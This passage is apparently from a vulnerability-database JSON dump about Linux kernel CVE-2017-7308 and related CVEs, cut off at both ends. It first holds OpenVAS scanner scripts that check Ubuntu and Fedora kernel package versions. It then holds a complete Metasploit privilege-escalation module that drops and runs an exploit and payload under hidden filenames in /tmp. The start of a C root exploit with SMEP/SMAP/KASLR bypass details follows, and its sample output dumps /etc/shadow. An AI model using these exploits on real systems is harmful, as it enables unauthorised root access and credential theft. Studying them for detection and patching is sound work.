LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-72-powerpc-smp\", ver:\"4.4.0-72.93\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-72-powerpc64-smp\", ver:\"4.4.0-72.93\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1013.16\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.4.0.72.78\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.4.0.72.78\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-gke\", ver:\"4.4.0.1010.12\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.4.0.72.78\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"4.4.0.72.78\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"4.4.0.72.78\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"4.4.0.72.78\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp-lts-utopic\", ver:\"4.4.0.72.78\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp-lts-vivid\", ver:\"4.4.0.72.78\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp-lts-wily\", ver:\"4.4.0.72.78\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp-lts-xenial\", ver:\"4.4.0.72.78\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.4.0.1052.53\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-snapdragon\", ver:\"4.4.0.1055.48\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7308"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-04-06T00:00:00", "id": "OPENVAS:1361412562310843128", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843128", "type": "openvas", "title": "Ubuntu Update for linux-hwe USN-3256-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-hwe USN-3256-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843128\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-06 06:33:12 +0200 (Thu, 06 Apr 2017)\");\n script_cve_id(\"CVE-2017-7308\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-hwe USN-3256-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-hwe'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3256-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 16.10. This\n update provides the corresponding updates for the Linux Hardware Enablement\n (HWE) kernel for each of the respective prior Ubuntu LTS releases. Andrey\n Konovalov discovered that the AF_PACKET implementation in the Linux kernel did\n not properly validate certain block-size data. A local attacker could use this\n to cause a denial of service (system crash).\");\n script_tag(name:\"affected\", value:\"linux-hwe on Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3256-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3256-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-72-generic\", ver:\"4.4.0-72.93~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-72-generic-lpae\", ver:\"4.4.0-72.93~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-72-lowlatency\", ver:\"4.4.0-72.93~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-72-powerpc-e500mc\", ver:\"4.4.0-72.93~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-72-powerpc-smp\", ver:\"4.4.0-72.93~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-72-powerpc64-smp\", ver:\"4.4.0-72.93~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-lts-xenial\", ver:\"4.4.0.72.59\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lts-xenial\", ver:\"4.4.0.72.59\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-lts-xenial\", ver:\"4.4.0.72.59\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc-lts-xenial\", ver:\"4.4.0.72.59\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp-lts-xenial\", ver:\"4.4.0.72.59\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp-lts-xenial\", ver:\"4.4.0.72.59\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-116-generic\", ver:\"3.13.0-116.163~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-116-generic-lpae\", ver:\"3.13.0-116.163~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-lts-trusty\", ver:\"3.13.0.116.107\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lts-trusty\", ver:\"3.13.0.116.107\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-46-generic\", ver:\"4.8.0-46.49~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-46-generic-lpae\", ver:\"4.8.0-46.49~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-46-lowlatency\", ver:\"4.8.0-46.49~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-hwe-16.04\", ver:\"4.8.0.46.18\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-hwe-16.04\", ver:\"4.8.0.46.18\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-hwe-16.04\", ver:\"4.8.0.46.18\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5967", "CVE-2017-5970"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-02-21T00:00:00", "id": "OPENVAS:1361412562310872391", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872391", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2017-0054c7b1f0", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2017-0054c7b1f0\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872391\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-02-21 05:51:59 +0100 (Tue, 21 Feb 2017)\");\n script_cve_id(\"CVE-2017-5970\", \"CVE-2017-5967\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2017-0054c7b1f0\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-0054c7b1f0\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/H2AMQ3SLRN23WOBJ33ZEYAXNAVP3JI7V\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.9.10~200.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:34:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5967", "CVE-2017-5970"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-02-21T00:00:00", "id": "OPENVAS:1361412562310872392", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872392", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2017-787bc0d5b4", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2017-787bc0d5b4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872392\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-02-21 05:52:01 +0100 (Tue, 21 Feb 2017)\");\n script_cve_id(\"CVE-2017-5970\", \"CVE-2017-5967\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2017-787bc0d5b4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-787bc0d5b4\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YT2ZFEEAXVYYN7PG5KXTKJKJURYC4SNC\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.9.10~100.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "packetstorm": [{"lastseen": "2018-05-18T01:24:31", "description": "", "published": "2018-05-17T00:00:00", "type": "packetstorm", "title": "AF_PACKET packet_set_ring Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7308"], "modified": "2018-05-17T00:00:00", "id": "PACKETSTORM:147685", "href": "https://packetstormsecurity.com/files/147685/AF_PACKET-packet_set_ring-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GoodRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Linux::Priv \ninclude Msf::Post::Linux::System \ninclude Msf::Post::Linux::Kernel \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'AF_PACKET packet_set_ring Privilege Escalation', \n'Description' => %q{ \nThis module exploits a heap-out-of-bounds write in the packet_set_ring \nfunction in net/packet/af_packet.c (AF_PACKET) in the Linux kernel \nto execute code as root (CVE-2017-7308). \n \nThe bug was initially introduced in 2011 and patched in version 4.10.6, \npotentially affecting a large number of kernels; however this exploit \ntargets only systems using Ubuntu Xenial kernels 4.8.0 < 4.8.0-46, \nincluding Linux distros based on Ubuntu Xenial, such as Linux Mint. \n \nThe target system must have unprivileged user namespaces enabled and \ntwo or more CPU cores. \n \nBypasses for SMEP, SMAP and KASLR are included. Failed exploitation \nmay crash the kernel. \n \nThis module has been tested successfully on Linux Mint 18 (x86_64) \nwith kernel versions: \n \n4.8.0-34-generic; \n4.8.0-36-generic; \n4.8.0-39-generic; \n4.8.0-41-generic; \n4.8.0-42-generic; \n4.8.0-44-generic; \n4.8.0-45-generic. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Andrey Konovalov', # Discovery and C exploit \n'Brendan Coles' # Metasploit \n], \n'DisclosureDate' => 'Mar 29 2017', \n'Platform' => [ 'linux' ], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Targets' => [[ 'Auto', {} ]], \n'Privileged' => true, \n'References' => \n[ \n[ 'EDB', '41994' ], \n[ 'CVE', '2017-7308' ], \n[ 'BID', '97234' ], \n[ 'URL', 'https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html' ], \n[ 'URL', 'https://www.coresecurity.com/blog/solving-post-exploitation-issue-cve-2017-7308' ], \n[ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7308.html', ], \n[ 'URL', 'https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c' ], \n[ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/cve-2017-7308/CVE-2017-7308/poc.c' ] \n], \n'DefaultTarget' => 0)) \nregister_options [ \nOptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]), \nOptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), \n] \nend \n \ndef base_dir \ndatastore['WritableDir'].to_s \nend \n \ndef upload(path, data) \nprint_status \"Writing '#{path}' (#{data.size} bytes) ...\" \nwrite_file path, data \nend \n \ndef upload_and_chmodx(path, data) \nupload path, data \ncmd_exec \"chmod +x '#{path}'\" \nend \n \ndef upload_and_compile(path, data) \nupload \"#{path}.c\", data \ngcc_cmd = \"gcc -o #{path} #{path}.c\" \nif session.type.eql? 'shell' \ngcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\" \nend \n \noutput = cmd_exec gcc_cmd \nunless output.blank? \nprint_error output \nfail_with Failure::Unknown, \"#{path}.c failed to compile\" \nend \n \ncmd_exec \"chmod +x #{path}\" \nend \n \ndef exploit_data(file) \npath = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2017-7308', file \nfd = ::File.open path, 'rb' \ndata = fd.read fd.stat.size \nfd.close \ndata \nend \n \ndef live_compile? \nreturn false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True') \n \nif has_gcc? \nvprint_good 'gcc is installed' \nreturn true \nend \n \nunless datastore['COMPILE'].eql? 'Auto' \nfail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.' \nend \nend \n \ndef check \nversion = kernel_release \nunless version =~ /^4\\.8\\.0-(34|36|39|41|42|44|45)-generic/ \nvprint_error \"Linux kernel version #{version} is not vulnerable\" \nreturn CheckCode::Safe \nend \nvprint_good \"Linux kernel version #{version} is vulnerable\" \n \narch = kernel_hardware \nunless arch.include? 'x86_64' \nvprint_error \"System architecture #{arch} is not supported\" \nreturn CheckCode::Safe \nend \nvprint_good \"System architecture #{arch} is supported\" \n \ncores = get_cpu_info[:cores].to_i \nmin_required_cores = 2 \nunless cores >= min_required_cores \nvprint_error \"System has less than #{min_required_cores} CPU cores\" \nreturn CheckCode::Safe \nend \nvprint_good \"System has #{cores} CPU cores\" \n \nunless userns_enabled? \nvprint_error 'Unprivileged user namespaces are not permitted' \nreturn CheckCode::Safe \nend \nvprint_good 'Unprivileged user namespaces are permitted' \n \nif kptr_restrict? && dmesg_restrict? \nvprint_error 'Both kernel.kptr_restrict and kernel.dmesg_destrict are enabled. KASLR bypass will fail.' \nreturn CheckCode::Safe \nend \n \nCheckCode::Appears \nend \n \ndef exploit \nif check != CheckCode::Appears \nfail_with Failure::NotVulnerable, 'Target is not vulnerable' \nend \n \nif is_root? \nfail_with Failure::BadConfig, 'Session already has root privileges' \nend \n \nunless cmd_exec(\"test -w '#{base_dir}' && echo true\").include? 'true' \nfail_with Failure::BadConfig, \"#{base_dir} is not writable\" \nend \n \n# Upload exploit executable \nexecutable_name = \".#{rand_text_alphanumeric rand(5..10)}\" \nexecutable_path = \"#{base_dir}/#{executable_name}\" \nif live_compile? \nvprint_status 'Live compiling exploit on system...' \nupload_and_compile executable_path, exploit_data('poc.c') \nrm_f \"#{executable_path}.c\" \nelse \nvprint_status 'Dropping pre-compiled exploit on system...' \nupload_and_chmodx executable_path, exploit_data('exploit') \nend \n \n# Upload payload executable \npayload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\" \nupload_and_chmodx payload_path, generate_payload_exe \n \n# Launch exploit \nprint_status 'Launching exploit...' \noutput = cmd_exec \"#{executable_path} #{payload_path}\" \noutput.each_line { |line| vprint_status line.chomp } \nprint_status 'Deleting executable...' \nrm_f executable_path \nRex.sleep 5 \nprint_status 'Deleting payload...' \nrm_f payload_path \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/147685/af_packet_packet_set_ring_priv_esc.rb.txt"}], "zdt": [{"lastseen": "2018-04-01T18:24:49", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2017-05-12T00:00:00", "title": "Linux Kernel 4.8.0 - Packet Socket Local root Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7308"], "modified": "2017-05-12T00:00:00", "href": "https://0day.today/exploit/description/27761", "id": "1337DAY-ID-27761", "sourceData": "// A proof-of-concept local root exploit for CVE-2017-7308.\r\n// Includes a SMEP & SMAP bypass.\r\n// Tested on 4.8.0-41-generic Ubuntu kernel.\r\n// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308\r\n//\r\n// Usage:\r\n// [email\u00a0protected]:~$ uname -a\r\n// Linux ubuntu 4.8.0-41-generic #44~16.04.1-Ubuntu SMP Fri Mar 3 ...\r\n// [email\u00a0protected]:~$ gcc pwn.c -o pwn\r\n// [email\u00a0protected]:~$ ./pwn \r\n// [.] starting\r\n// [.] namespace sandbox set up\r\n// [.] KASLR bypass enabled, getting kernel addr\r\n// [.] done, kernel text: ffffffff87000000\r\n// [.] commit_creds: ffffffff870a5cf0\r\n// [.] prepare_kernel_cred: ffffffff870a60e0\r\n// [.] native_write_cr4: ffffffff87064210\r\n// [.] padding heap\r\n// [.] done, heap is padded\r\n// [.] SMEP & SMAP bypass enabled, turning them off\r\n// [.] done, SMEP & SMAP should be off now\r\n// [.] executing get root payload 0x401516\r\n// [.] done, should be root now\r\n// [.] checking if we got root\r\n// [+] got r00t ^_^\r\n// [email\u00a0protected]:/home/user# cat /etc/shadow\r\n// root:!:17246:0:99999:7:::\r\n// daemon:*:17212:0:99999:7:::\r\n// bin:*:17212:0:99999:7:::\r\n// ...\r\n//\r\n// Andrey Konovalov <[email\u00a0protected]>\r\n \r\n#define _GNU_SOURCE\r\n \r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <stdarg.h>\r\n#include <stdbool.h>\r\n#include <stddef.h>\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <sched.h>\r\n \r\n#include <sys/ioctl.h>\r\n#include <sys/klog.h>\r\n#include <sys/mman.h>\r\n#include <sys/socket.h>\r\n#include <sys/syscall.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n \r\n#include <arpa/inet.h>\r\n#include <linux/if_packet.h>\r\n#include <linux/ip.h>\r\n#include <linux/udp.h>\r\n#include <netinet/if_ether.h>\r\n#include <net/if.h>\r\n \r\n#define ENABLE_KASLR_BYPASS 1\r\n#define ENABLE_SMEP_SMAP_BYPASS 1\r\n \r\n// Will be overwritten if ENABLE_KASLR_BYPASS\r\nunsigned long KERNEL_BASE = 0xffffffff81000000ul;\r\n \r\n// Kernel symbol offsets\r\n#define COMMIT_CREDS 0xa5cf0ul\r\n#define PREPARE_KERNEL_CRED 0xa60e0ul\r\n#define NATIVE_WRITE_CR4 0x64210ul\r\n \r\n// Should have SMEP and SMAP bits disabled\r\n#define CR4_DESIRED_VALUE 0x407f0ul\r\n \r\n#define KMALLOC_PAD 512\r\n#define PAGEALLOC_PAD 1024\r\n \r\n// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *\r\n \r\ntypedef uint32_t u32;\r\n \r\n// $ pahole -C hlist_node ./vmlinux\r\nstruct hlist_node {\r\n struct hlist_node * next; /* 0 8 */\r\n struct hlist_node * * pprev; /* 8 8 */\r\n};\r\n \r\n// $ pahole -C timer_list ./vmlinux\r\nstruct timer_list {\r\n struct hlist_node entry; /* 0 16 */\r\n long unsigned int expires; /* 16 8 */\r\n void (*function)(long unsigned int); /* 24 8 */\r\n long unsigned int data; /* 32 8 */\r\n u32 flags; /* 40 4 */\r\n int start_pid; /* 44 4 */\r\n void * start_site; /* 48 8 */\r\n char 